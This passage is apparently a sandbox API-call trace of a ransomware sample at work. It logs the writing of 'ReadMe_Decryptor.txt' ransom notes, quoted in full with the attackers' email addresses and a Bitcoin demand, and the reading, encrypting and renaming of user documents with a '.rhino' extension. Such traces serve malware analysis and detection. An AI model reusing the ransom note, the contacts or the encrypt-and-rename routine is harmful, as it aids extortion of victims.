hHeap=0x6d0000) returned 1 [0107.100] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23bc208 [0107.100] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0107.100] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23bc2d0 [0107.100] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x712898 [0107.100] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc2d0 | out: hHeap=0x6d0000) returned 1 [0107.100] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\gfnkocqfgrm6l\\oaemnae\\4egq3w\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0107.101] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0107.101] WriteFile (in: hFile=0x110, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x292f35c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x292f35c*=0x2a4, lpOverlapped=0x0) returned 1 [0107.103] CloseHandle (hObject=0x110) returned 1 [0107.103] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0107.103] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W\\QZDgmOZTc7o7iXJAMnXT.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\gfnkocqfgrm6l\\oaemnae\\4egq3w\\qzdgmoztc7o7ixjamnxt.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0107.104] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0x345e [0107.104] LockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x357e, nNumberOfBytesToLockHigh=0x0) returned 1 [0107.104] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.104] ReadFile (in: hFile=0x110, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0107.105] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.106] ReadFile (in: hFile=0x110, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x345e, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x345e, lpOverlapped=0x0) returned 1 [0107.106] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713820 [0107.106] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.106] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x711db8 [0107.106] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b0b10 [0107.106] GetLastError () returned 0x0 [0107.106] SetLastError (dwErrCode=0x0) [0107.106] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711db8 | out: hHeap=0x6d0000) returned 1 [0107.106] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3481) returned 0x23b2088 [0107.107] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0b10 | out: hHeap=0x6d0000) returned 1 [0107.107] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0648 [0107.107] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x712898 [0107.107] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0648 | out: hHeap=0x6d0000) returned 1 [0107.107] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.107] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x713820 [0107.107] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x713830 [0107.107] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.107] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x713820 [0107.107] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.107] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713830 [0107.107] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.108] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x713820 [0107.108] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.108] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x757ef8 [0107.108] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.108] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x757f70 [0107.108] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757ef8 | out: hHeap=0x6d0000) returned 1 [0107.108] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x7130c0 [0107.108] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757f70 | out: hHeap=0x6d0000) returned 1 [0107.108] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x7118c0 [0107.108] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7130c0 | out: hHeap=0x6d0000) returned 1 [0107.108] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x711db8 [0107.108] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7118c0 | out: hHeap=0x6d0000) returned 1 [0107.108] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x23b0b10 [0107.108] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711db8 | out: hHeap=0x6d0000) returned 1 [0107.108] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef848 [0107.108] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0b10 | out: hHeap=0x6d0000) returned 1 [0107.108] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x7148e0 [0107.108] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef848 | out: hHeap=0x6d0000) returned 1 [0107.108] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x714978 [0107.108] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.108] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23c0b40 [0107.108] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714978 | out: hHeap=0x6d0000) returned 1 [0107.108] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x7148e0 [0107.109] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23c0b40 | out: hHeap=0x6d0000) returned 1 [0107.109] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x714e58 [0107.109] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.109] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x719718 [0107.109] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714e58 | out: hHeap=0x6d0000) returned 1 [0107.109] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x719b50 [0107.109] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0107.109] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b5518 [0107.109] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719b50 | out: hHeap=0x6d0000) returned 1 [0107.109] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x719718 [0107.109] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b5518 | out: hHeap=0x6d0000) returned 1 [0107.109] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x23b5518 [0107.109] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0107.109] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x23b6a58 [0107.109] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b5518 | out: hHeap=0x6d0000) returned 1 [0107.109] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x23f16b8 [0107.110] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b6a58 | out: hHeap=0x6d0000) returned 1 [0107.110] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x23b5518 [0107.110] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23f16b8 | out: hHeap=0x6d0000) returned 1 [0107.110] WriteFile (in: hFile=0x110, lpBuffer=0x23b5520*, nNumberOfBytesToWrite=0x357e, lpNumberOfBytesWritten=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x23b5520*, lpNumberOfBytesWritten=0x292f304*=0x357e, lpOverlapped=0x0) returned 1 [0107.110] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b5518 | out: hHeap=0x6d0000) returned 1 [0107.111] UnlockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x357e, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0107.111] CloseHandle (hObject=0x110) returned 1 [0107.114] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x7148e0 [0107.114] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x166) returned 0x23c0b40 [0107.114] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.114] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W\\QZDgmOZTc7o7iXJAMnXT.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\gfnkocqfgrm6l\\oaemnae\\4egq3w\\qzdgmoztc7o7ixjamnxt.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W\\QZDgmOZTc7o7iXJAMnXT.odp.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\gfnkocqfgrm6l\\oaemnae\\4egq3w\\qzdgmoztc7o7ixjamnxt.odp.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0107.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23c0b40 | out: hHeap=0x6d0000) returned 1 [0107.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0107.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b2088 | out: hHeap=0x6d0000) returned 1 [0107.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23bc2d0 [0107.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23bc208 [0107.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x712898 [0107.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.115] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\gfnkocqfgrm6l\\oaemnae\\4egq3w\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0107.116] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0107.116] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W\\X8dzWrXMsQ50rnRg8ep8.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\gfnkocqfgrm6l\\oaemnae\\4egq3w\\x8dzwrxmsq50rnrg8ep8.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0107.116] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0x187b0 [0107.116] LockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x188d0, nNumberOfBytesToLockHigh=0x0) returned 1 [0107.116] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.116] ReadFile (in: hFile=0x110, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0107.117] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.117] ReadFile (in: hFile=0x110, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x187b0, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x187b0, lpOverlapped=0x0) returned 1 [0107.118] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713820 [0107.118] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.118] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x711db8 [0107.118] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b0b10 [0107.118] GetLastError () returned 0x0 [0107.118] SetLastError (dwErrCode=0x0) [0107.118] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711db8 | out: hHeap=0x6d0000) returned 1 [0107.119] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x187d3) returned 0x23ff070 [0107.121] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0b10 | out: hHeap=0x6d0000) returned 1 [0107.121] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0648 [0107.121] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x712898 [0107.121] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0648 | out: hHeap=0x6d0000) returned 1 [0107.121] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.121] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x713820 [0107.121] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x713830 [0107.121] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.121] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x713820 [0107.122] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.122] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713830 [0107.122] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.122] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x713820 [0107.122] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.122] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x757f70 [0107.122] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.122] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x757ef8 [0107.122] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757f70 | out: hHeap=0x6d0000) returned 1 [0107.122] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x7130c0 [0107.122] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757ef8 | out: hHeap=0x6d0000) returned 1 [0107.122] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x7118c0 [0107.122] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7130c0 | out: hHeap=0x6d0000) returned 1 [0107.122] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x711db8 [0107.122] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7118c0 | out: hHeap=0x6d0000) returned 1 [0107.122] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x23b0b10 [0107.122] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711db8 | out: hHeap=0x6d0000) returned 1 [0107.122] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef848 [0107.122] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0b10 | out: hHeap=0x6d0000) returned 1 [0107.122] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x7148e0 [0107.122] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef848 | out: hHeap=0x6d0000) returned 1 [0107.122] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x714978 [0107.123] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.123] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23c0b40 [0107.123] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714978 | out: hHeap=0x6d0000) returned 1 [0107.123] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x7148e0 [0107.123] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23c0b40 | out: hHeap=0x6d0000) returned 1 [0107.123] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x714e58 [0107.123] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.123] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x719718 [0107.123] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714e58 | out: hHeap=0x6d0000) returned 1 [0107.123] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x719b50 [0107.123] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0107.123] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b2088 [0107.123] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719b50 | out: hHeap=0x6d0000) returned 1 [0107.123] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x719718 [0107.130] UnlockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x188d0, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0107.130] CloseHandle (hObject=0x110) returned 1 [0107.130] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x7148e0 [0107.130] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x166) returned 0x23c0b40 [0107.137] LockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x82fb, nNumberOfBytesToLockHigh=0x0) returned 1 [0107.137] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.137] ReadFile (in: hFile=0x110, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0107.139] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.139] ReadFile (in: hFile=0x110, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x81db, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x81db, lpOverlapped=0x0) returned 1 [0107.140] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713820 [0107.140] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.141] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x713820 [0107.141] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x713830 [0107.143] UnlockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x82fb, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0107.143] CloseHandle (hObject=0x110) returned 1 [0107.167] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75dfe0 [0107.167] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x136) returned 0x751928 [0107.232] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0107.232] WriteFile (in: hFile=0x294, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x292f35c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x292f35c*=0x2a4, lpOverlapped=0x0) returned 1 [0107.233] CloseHandle (hObject=0x294) returned 1 [0107.233] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0107.233] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\di02.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\gfnkocqfgrm6l\\oaemnae\\di02.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0107.234] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0x8590 [0107.234] LockFile (hFile=0x294, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x86b0, nNumberOfBytesToLockHigh=0x0) returned 1 [0107.234] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.234] ReadFile (in: hFile=0x294, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0107.235] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.235] ReadFile (in: hFile=0x294, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x8590, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x8590, lpOverlapped=0x0) returned 1 [0107.235] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713830 [0107.235] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.235] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x711d10 [0107.235] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b0ac8 [0107.235] GetLastError () returned 0x0 [0107.235] SetLastError (dwErrCode=0x0) [0107.235] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, 